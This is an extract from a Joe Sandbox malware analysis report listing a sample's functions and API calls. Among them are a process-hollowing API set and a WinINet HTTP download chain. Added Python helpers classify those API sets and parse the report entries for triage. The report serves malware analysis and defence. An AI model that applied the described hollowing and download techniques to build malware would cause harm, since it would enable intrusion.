• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: HttpOpenRequest
• String ID: GET
• API String ID: 1984915467-1805413626
• Opcode ID: 062854b03fa9b6577b3a74efd1b22bff19191b9f15f07d692b7de5ab155089a2
• Instruction ID: 8e83dcfa2c2d97efb602a18a9ba3dc01c5ea0efa355a390095ddbcd516262747
• Opcode Fuzzy Hash: 062854b03fa9b6577b3a74efd1b22bff19191b9f15f07d692b7de5ab155089a2
• Instruction Fuzzy Hash: D6012CB5F15229DFE710DFA8CC80E7B77F9EB48700B154024E910E7321E6B49C018B65
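Analyst note and added example (this code is not part of the Joe Sandbox report and not the sample's own code). Read together, the function entries above describe two capabilities: the LoadLibraryA function at 44163a references CreateProcessA, GetThreadContext, SetThreadContext, VirtualAllocEx, WriteProcessMemory, ResumeThread and ReadProcessMemory by name, which is the API set used for process hollowing and matches the "Creates a process in suspended mode (likely to inject code)" signature in the Detection section; the CreateDirectoryA/InternetOpenA function at 43d4eb, the HttpOpenRequestA (GET) function at 417e7d and the InternetReadFile function (API ID FileInternetRead) form a download-to-disk chain, matching "HTTP GET or POST without a user agent" and "Drops PE files". The helper below turns such name sets into a capability verdict, reporting a partial cluster together with the required names still missing rather than silently ignoring it. The signature sets, the carving threshold and the function names are this example's assumptions; the report-derived inputs are copied from the entries above and the dump fragment is constructed.

```python
import re

# Capability signatures: every "required" name must be present for a full
# match; "optional" names only strengthen it.  These sets are this example's
# own assumptions, not something the report states.
SIGNATURES = {
    "process hollowing (RunPE)": {
        "required": {"CreateProcessA", "GetThreadContext", "SetThreadContext",
                     "VirtualAllocEx", "WriteProcessMemory", "ResumeThread"},
        "optional": {"ReadProcessMemory", "NtUnmapViewOfSection",
                     "ZwUnmapViewOfSection"},
    },
    "WinInet HTTP download": {
        "required": {"InternetOpenA", "HttpOpenRequestA", "InternetReadFile"},
        "optional": {"InternetConnectA", "HttpSendRequestA",
                     "CreateDirectoryA", "CreateFileA"},
    },
}

# Inputs copied from the report entries above: the String ID of the
# LoadLibraryA function at 44163a, and the API lines of the 43d4eb and
# 417e7d functions.  InternetReadFile comes from the entry whose API ID is
# FileInternetRead (no API line is shown for it, so it is added by hand).
REPORT_STRING_ID = ("CreateProcessA$GetThreadContext$ReadProcessMemory$ResumeThread"
                    "$SetThreadContext$VirtualAllocEx$WriteProcessMemory$dbghelp.dll")
REPORT_WININET_REFS = [
    "CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0043D5C8",
    "InternetOpenA.WININET ref: 0043D66B",
    "HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A",
]
EXTRA_NAMES = {"InternetReadFile"}

# Printable ASCII runs of at least 4 bytes (threshold is an assumption).
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def carve_strings(blob: bytes) -> set:
    """Carve printable ASCII strings out of a raw memory dump."""
    return {m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)}


def parse_report_field(field: str) -> set:
    """Split a Joe Sandbox 'String ID' value ('a$b$c') into its strings."""
    return {s for s in field.split("$") if s}


def api_names_from_refs(refs) -> set:
    """'HttpOpenRequestA.WININET(...), ref: ...' -> 'HttpOpenRequestA'."""
    return {r.split(".", 1)[0] for r in refs}


def classify(names: set) -> dict:
    """Map a set of API names to capabilities.  A cluster with no hit at all
    is dropped; a partial cluster is kept and lists the missing names so a
    reviewer can check whether they are resolved elsewhere in the binary."""
    result = {}
    for cap, sig in SIGNATURES.items():
        missing = sig["required"] - names
        if len(missing) == len(sig["required"]):
            continue
        result[cap] = {
            "complete": not missing,
            "missing": sorted(missing),
            "optional_hits": sorted(sig["optional"] & names),
        }
    return result


def triage_dump(blob: bytes) -> dict:
    """Carve strings from a dump fragment and classify them in one step."""
    return classify(carve_strings(blob))


if __name__ == "__main__":
    print(classify(parse_report_field(REPORT_STRING_ID)))
    print(classify(api_names_from_refs(REPORT_WININET_REFS) | EXTRA_NAMES))
    # Constructed dump fragment (not from the report), NUL-separated strings.
    sample = b"\x00\x00InternetOpenA\x00GET\x00HttpOpenRequestA\x00InternetReadFile\x00"
    print(triage_dump(sample))
```

The example works from the String ID and API lines rather than from the API ID field, because the entries on this page show that field as the name's CamelCase tokens sorted alphabetically with the A/W suffix dropped (LibraryLoad for LoadLibraryA, FileInternetRead for InternetReadFile), which is not reversible in general. Run on the 44163a String ID it reports the hollowing cluster as complete with ReadProcessMemory as an optional hit; run on the WinInet references it reports the download cluster as complete with CreateDirectoryA as an optional hit.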

Control-flow Graph (legend: Executed / Not Executed)
Node 95: 417ec8-417f47, HttpOpenRequestA
APIs
• HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HttpOpenRequest
                                                                                                                                                                                                                      • String ID: GET
                                                                                                                                                                                                                      • API String ID: 1984915467-1805413626
                                                                                                                                                                                                                      • Opcode ID: c66d1da5463de27d8b4bae67896555a8706cc2ef2a306578294b9fcb2610e284
                                                                                                                                                                                                                      • Instruction ID: 746a938a8d7015067999d655a9801a7b5ec994f78fa219be27d916c50eeeb009
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c66d1da5463de27d8b4bae67896555a8706cc2ef2a306578294b9fcb2610e284
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2401EC75F11129DFE710DFA8DC80E7B77F9EB48710B058124E910E7325E7B598118B65

Control-flow Graph

control_flow_graph 98 440f40-44138d LoadLibraryA 123 441399-4413c0 98->123
APIs
• LoadLibraryA.KERNEL32(?,?,?), ref: 00441370
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 799670d38f95c12d1022abae05ea2df1a88d45effb93e2887d36180bafb66c8a
• Instruction ID: 4376c3151c101c1f2856b8dd4cb0e85140bd373f91dae02cc3ec93c000e5ac0a
• Opcode Fuzzy Hash: 799670d38f95c12d1022abae05ea2df1a88d45effb93e2887d36180bafb66c8a
• Instruction Fuzzy Hash: 09C17779606600DFCB04DF6ADC58910B7A6EB883053D5A06DD80A8777EEBF15C93CB0A

Control-flow Graph

control_flow_graph 124 414de8-414ebd InternetCrackUrlA 132 414ec1-414ecb 124->132
APIs
• InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00414EAE
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: CrackInternet
• String ID:
• API String ID: 1381609488-0
• Opcode ID: f0495e73a0cd1ecd227d6a76f46282a41c03316446f7fb33a12e155b2daa8f88
• Instruction ID: ad51b445d1971d488cb6eb1a7ddcfcdc88647cb932c96ebc81f61fd4cf75d457
• Opcode Fuzzy Hash: f0495e73a0cd1ecd227d6a76f46282a41c03316446f7fb33a12e155b2daa8f88
• Instruction Fuzzy Hash: 00212B756002049FDB40CF6ADC84E5A77E4FF48214B058175F808C7322D7B4EE568BAA

Control-flow Graph

control_flow_graph 133 417d09-417dbb InternetOpenA 138 417dc4-417de0 133->138
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: InternetOpen
• String ID:
• API String ID: 2038078732-0
• Opcode ID: 5a2dae33c1122239a1467a38b4929007afad54bd86b24ca38b5b100568cd55b3
• Instruction ID: d799e9cda3f15cb694ab0866f120829321f9a12d57094e41915ee2447f8f2554
• Opcode Fuzzy Hash: 5a2dae33c1122239a1467a38b4929007afad54bd86b24ca38b5b100568cd55b3
• Instruction Fuzzy Hash: C321A131A102188FCB00EFA8DC80E9A77F5FF8C304B148128E95597322FBB0A906CF95
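The entries in this part of the report are the IDA plugin's raw output for the sample's WinINet and loader call sites, one block-graph line plus an "APIs" list per function, and reading a call chain out of them by eye is slow. The following parser is an added triage aid, not Joe Sandbox code and not code from the sample: it assumes only the entry layout visible on this page (a `control_flow_graph` line of numbered blocks `id start-end [ApiName]` and edges `a->b`, followed by `• Name.MODULE(args), ref: ADDR` bullets under "APIs") and turns it into call records ordered by call-site address. The embedded input is constructed from five entries on this page, cut down to the lines the parser reads; the section names it recognises are the ones shown here.

```python
"""Parse Joe Sandbox 'Control-flow Graph' entries (extracted as plain text) into
per-function API call records for triage. Added example: not Joe Sandbox code and
not code from the sample. Assumes the layout seen on this page: a 'control_flow_graph'
line with numbered blocks ('id start-end [ApiName]') and edges ('a->b'), then an
'APIs' section of '• Name.MODULE(args), ref: ADDR' bullets."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed input: five entries from this page, cut down to the lines the
# parser reads (memory-dump and hash lines would be skipped anyway).
SAMPLE_ENTRIES = """\
control_flow_graph 95 417ec8-417f47 HttpOpenRequestA
APIs
• HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
Similarity
• API ID: HttpOpenRequest
• String ID: GET

control_flow_graph 98 440f40-44138d LoadLibraryA 123 441399-4413c0 98->123
APIs
• LoadLibraryA.KERNEL32(?,?,?), ref: 00441370

control_flow_graph 124 414de8-414ebd InternetCrackUrlA 132 414ec1-414ecb 124->132
APIs
• InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00414EAE

control_flow_graph 133 417d09-417dbb InternetOpenA 138 417dc4-417de0 133->138
APIs

control_flow_graph 139 418160-418182 InternetCloseHandle 140 418185 139->140
APIs
• InternetCloseHandle.WININET ref: 00418166
"""

NODE_RE = re.compile(r"(\d+) ([0-9a-f]{4,})(?:-([0-9a-f]{4,}))?(?: ([A-Za-z_]\w*))?")
EDGE_RE = re.compile(r"(\d+)->(\d+)")
API_RE = re.compile(r"^• (\w+)\.(\w+)(?:\((.*)\),)? ref: ([0-9A-Fa-f]+)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]  # '?' = argument the sandbox could not resolve
    ref: int         # address of the call instruction

@dataclass
class Block:
    node: int
    start: int
    end: Optional[int]  # None for a single-address block such as '140 418185'
    api: Optional[str]  # API name the plugin used as the block label

@dataclass
class Function:
    blocks: List[Block] = field(default_factory=list)
    edges: List[Tuple[int, int]] = field(default_factory=list)
    apis: List[ApiCall] = field(default_factory=list)

    @property
    def label(self) -> Optional[str]:
        return next((b.api for b in self.blocks if b.api), None)

def parse_entries(text: str) -> List[Function]:
    """One Function per 'control_flow_graph' line; only the 'APIs' bullets are parsed."""
    functions: List[Function] = []
    current: Optional[Function] = None
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("control_flow_graph "):
            current = Function()
            functions.append(current)
            section = None
            body = line[len("control_flow_graph "):]
            for m in NODE_RE.finditer(body):
                end = int(m.group(3), 16) if m.group(3) else None
                current.blocks.append(Block(int(m.group(1)), int(m.group(2), 16), end, m.group(4)))
            current.edges = [(int(a), int(b)) for a, b in EDGE_RE.findall(body)]
        elif line in SECTIONS:
            section = line
        elif current is not None and section == "APIs" and line.startswith("• "):
            m = API_RE.match(line)
            if m:  # a bullet in an unexpected shape is skipped, not guessed at
                args = m.group(3).split(",") if m.group(3) is not None else []
                current.apis.append(ApiCall(m.group(1), m.group(2), args, int(m.group(4), 16)))
    return functions

def call_sequence(functions: List[Function]) -> List[Tuple[int, str]]:
    """Every recorded call as (call-site address, 'Name.MODULE'), ordered by address."""
    return sorted((c.ref, f"{c.name}.{c.module}") for f in functions for c in f.apis)

def calls_from_module(functions: List[Function], module: str) -> List[str]:
    """API names recorded for one module, in report order."""
    return [c.name for f in functions for c in f.apis if c.module.upper() == module.upper()]

def http_verbs(functions: List[Function]) -> List[str]:
    """Resolved verbs passed to HttpOpenRequestA (its second argument)."""
    return [c.args[1] for f in functions for c in f.apis
            if c.name == "HttpOpenRequestA" and len(c.args) > 1 and c.args[1] != "?"]

def labels_without_api_record(functions: List[Function]) -> List[str]:
    """Block labels whose entry has an empty 'APIs' section, i.e. no call site recorded."""
    return [f.label for f in functions if f.label and not f.apis]
```

Two caveats the parser preserves rather than papers over: the InternetOpenA entry carries a block label but an empty "APIs" section, so it is reported by `labels_without_api_record` instead of being given an invented call site, and arguments the sandbox shows as `?` stay unresolved, which is why `GET` is the only verb `http_verbs` can return for these entries. Ordering by `ref` gives the static layout of the call sites, not the runtime order of the calls.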

Control-flow Graph

control_flow_graph 139 418160-418182 InternetCloseHandle 140 418185 139->140
APIs
• InternetCloseHandle.WININET ref: 00418166
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandleInternet
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1081599783-0
                                                                                                                                                                                                                      • Opcode ID: 344a25893a46580cdbb853dae8e3f6e82f140c582bf9eaf235203a2b7d6ff21c
                                                                                                                                                                                                                      • Instruction ID: ae5e315c54a7670b2249e5b0f3bdf6a6f2b00f65773975af1cbbced8fcde3caa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 344a25893a46580cdbb853dae8e3f6e82f140c582bf9eaf235203a2b7d6ff21c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7601FB36B0522DDFDB00EF98EC80E9A73B4FF58218B114465E92597321EBB0AA16CF55

Control-flow Graph

Control-flow graph legend: Executed / Not Executed
control_flow_graph 146 417f58-417fa2 HttpSendRequestA 148 417fa9-417fcb 146->148
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: HttpRequestSend
• String ID:
• API String ID: 360639707-0
• Opcode ID: 640d22e51ea26dd4110a4910ea00f1bfb3b3238f2ad13e7a3fa7d490065beb0a
• Instruction ID: c5f7f24f37b68b0ee58fd2f50e06334a253e74aa66ac9acfdd0b5a5957e02501
• Opcode Fuzzy Hash: 640d22e51ea26dd4110a4910ea00f1bfb3b3238f2ad13e7a3fa7d490065beb0a
• Instruction Fuzzy Hash: 2601A470A102199FE760EF68DC84F5637B8AB8C700F01467CF715E72E2EAB09841CB15

Control-flow Graph

Control-flow graph legend: Executed / Not Executed
control_flow_graph 149 431480-4314c6 GetComputerNameA
APIs
• GetComputerNameA.KERNEL32(00000000), ref: 004314B3
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: 8f8eb795359fb0aa2d749ee19533a4635df463a2ca35125aa3eba5b7db898b85
• Instruction ID: fbecf42e50bf32649b0f86ce1194af764c2ba67d61e8489f1122926f9e73325e
• Opcode Fuzzy Hash: 8f8eb795359fb0aa2d749ee19533a4635df463a2ca35125aa3eba5b7db898b85
• Instruction Fuzzy Hash: 84E06DB17021006FDB58DF2DDCD5F6B72ED9BC9254B0A4028F804D7361EA74AC10C669

Control-flow Graph

Control-flow graph legend: Executed / Not Executed
control_flow_graph 155 4010c6-40110d VirtualAllocExNuma
APIs
• VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0043E8BB), ref: 004010F7
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: AllocNumaVirtual
• String ID:
• API String ID: 4233825816-0
• Opcode ID: bb8c22882e4e6801e3f93027a8384a536ab1f92f41c5be2d295d4875465a3d3e
• Instruction ID: d15b9f596ca57768b7915b5c70adcfe063bff0d2da7a8f47b6d44be3499abacb
• Opcode Fuzzy Hash: bb8c22882e4e6801e3f93027a8384a536ab1f92f41c5be2d295d4875465a3d3e
• Instruction Fuzzy Hash: 2FE09275A063508FD704FF7CDD8175933E0AF85605F05915CD884A7366EB30A99487C5

Control-flow Graph

Control-flow graph legend: Executed / Not Executed
control_flow_graph 157 417e16-417e67 InternetConnectA
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConnectInternet
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3050416762-0
                                                                                                                                                                                                                      • Opcode ID: d8bdd812af22da76226ce8ec8597369cd6329b795b9649a49ea347b5d7ed01be
                                                                                                                                                                                                                      • Instruction ID: 39c588309585c59699f010394ec1bf5a852f07e64b85a41ba6658fda9e5a6e49
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8bdd812af22da76226ce8ec8597369cd6329b795b9649a49ea347b5d7ed01be
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51F01C709097128FE314DF69D48066AB7F1BFC4646F14C62DE49497325EB709492CB46
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true (associated dumps identical to those listed for the first function in this section)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: fe00cb662a54cc21d0244e1f803d6a7692d16ee3833788be0c8e0b1dc36feb0e
• Instruction ID: cf296a1a1b11250edfbb2069b8a98eb1549536c670596b1f21556aec9cf299b1
• Opcode Fuzzy Hash: fe00cb662a54cc21d0244e1f803d6a7692d16ee3833788be0c8e0b1dc36feb0e
• Instruction Fuzzy Hash: C6F04477A00519DBCB00DF94EC9189877B4FF88320B058155ED05DB355E6B4AE15CB96
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true (associated dumps identical to those listed for the first function in this section)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: AllocVirtual
